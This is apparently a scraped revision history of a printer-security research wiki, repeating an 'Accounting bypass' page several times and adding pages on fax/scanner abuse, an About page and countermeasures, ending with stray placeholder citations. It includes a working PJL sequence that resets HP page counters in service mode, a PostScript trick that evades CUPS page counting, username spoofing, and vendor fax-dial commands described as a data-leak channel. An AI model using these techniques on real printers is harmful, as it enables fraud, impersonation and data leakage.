There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.

{| class="wikitable" style="text-align:center"
|+ Security features of LPRng and CUPS
|-
! Printing system !! Protocol !! Encryption !! Authentication !! Page counter
|-
| LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware
|-
| CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software
|}

== Authentication bypasses ==

LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable.

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [UEL], the counter simply has to be reset to its original value (for example, <code>2342</code>):

\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ

Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.

=== Software page counters ===

CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists (which will return ''false'' when interpreted in CUPS/Ghostscript) before actually printing the document as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
<@\textit{[...] code which is only executed on a printer device [...]}@>
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.



also: can we overwrite the pagecounter operator?

Fax and Scanner

2017-01-05T15:08:20Z

134.147.128.156:

While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax.

== Telefax ==

Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing.

Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested).

=== HP ===

According to [http://hplipopensource.com] fax can be accessed using PML on HP devices.

=== Xerox ===

According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code>

=== Brother ===

According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code>

=== Lexmark ===

According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code>

=== Kyocera ===

According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code>

=== Ricoh ===

Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code>

== Scanner ==

Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator '''_brpdfscan''' may possibly be used.

Accounting bypass

2017-01-05T14:57:51Z

134.147.128.156:

Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first.

== Introduction to print job accounting ==

There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]].

There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.

{| class="wikitable" style="text-align:center"
|+ Security features of LPRng and CUPS
|-
! Printing system !! Protocol !! Encryption !! Authentication !! Page counter
|-
| LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware
|-
| CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software
|}

== Authentication bypasses ==

LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable.

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), \url{http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf}.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), \url{https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf}.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N''. At the end of the document to be printed and separated by the \acs{UEL}, the counter simply has to be reset to its original value (<code>2342</code>).

Resetting the page counter on HP LaserJets:

\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ

Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.

=== Software page counters ===

%CUPS create document containing more pages or higher density than analyzed by CUPS. Below we will briefly discuss how LPRng and CUPS try to solve the problem of accounting.

% PostScript has access read access to the page counter, however on none of the devices we were able to set this value.

CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
<@\textit{[...] code which is only executed on a printer device [...]}@>
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter.



also: can we overwrite the pagecounter operator?

Accounting bypass

2017-01-05T14:49:35Z

134.147.128.156:

Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first.

== Introduction to print job accounting ==

There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]].

There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.

{| class="wikitable" style="text-align:center"
|+ Security features of LPRng and CUPS
|-
! Printing system !! Protocol !! Encryption !! Authentication !! Page counter
|-
| LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware
|-
| CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software
|}

== Authentication bypasses ==

LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable.

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), \url{http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf}.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), \url{https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf}.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N''. At the end of the document to be printed and separated by the \acs{UEL}, the counter simply has to be reset to its original value (<code>2342</code>).

Resetting the page counter on HP LaserJets:

<syntaxhighlight lang=pjl>
\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ
</syntaxhighlight>

Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.

=== Software page counters ===

%CUPS create document containing more pages or higher density than analyzed by CUPS. Below we will briefly discuss how LPRng and CUPS try to solve the problem of accounting.

% PostScript has access read access to the page counter, however on none of the devices we were able to set this value.

CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
<@\textit{[...] code which is only executed on a printer device [...]}@>
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter.



also: can we overwrite the pagecounter operator?

Hacking Printers:About

2017-01-05T14:45:53Z

134.147.128.156:

The '''Hacking Printers Wiki''' was created by [http://homepages.rub.de/jens.mueller-2/ Jens Müller], but its continued success depends on the contributions from many individuals in the security community.

Thanks to everybody for your help!

Hacking Printers:About

2017-01-05T14:45:03Z

134.147.128.156:

The ''Hacking Printers Wiki'' was created by '''Jens Müller''', but its continued success depends on the contributions from many individuals in the security community.

Thanks to everybody for your help!

Hacking Printers:About

2017-01-05T14:44:54Z

134.147.128.156: Created page with "The ''Hacking Printers Wiki'' was created by '''Jens Müller'', but its continued success depends on the contributions from many individuals in the security community. Thanks..."

The ''Hacking Printers Wiki'' was created by '''Jens Müller'', but its continued success depends on the contributions from many individuals in the security community.

Thanks to everybody for your help!

Countermeasures

2016-12-19T16:44:26Z

134.147.128.156:

__FORCETOC__

Most attacks against printers are enabled because there is no clear distinction between [[page description]] and [[printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks.

== Vendors ==

Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like PostScript from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented PJL extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their `hidden functions' and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device.

Code signing however also means technically restricting users to run vendor software. <ref name="fsf">This issue has been discussed by the when HP announced to introduce code signing for their printers in 2011: `Fixing rogue printers: don't trade one security threat for another. [https://en.wikipedia.org/wiki/.avi link]</ref> Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by \cite{waechter2005chai} who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers.

== Admins ==

Network administrators should never leave their printers accessible from the internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. If supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques.

== Users ==

Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data.

<ref name="Perry">Perry's Handbook, Sixth Edition, McGraw-Hill Co., 1984.</ref>
<ref name=OEDComputer>{{Cite journal |title=computer, ''n.'' |series=Oxford English Dictionary |url=http://dictionary.oed.com/ |publisher=Oxford University Press |edition=2 |year=1989 |accessdate=10 April 2009 |ref=harv}}</ref>

The Sun is pretty big.<ref>E. Miller, ''The Sun'', (New York: Academic Press, 2005), 23-5.</ref> The Moon, however, is not so big.<ref>''R. Smith, "Size of the Moon", ''Scientific American'', 46 (April 1978): 44-6.</ref>

==Notes==
<references />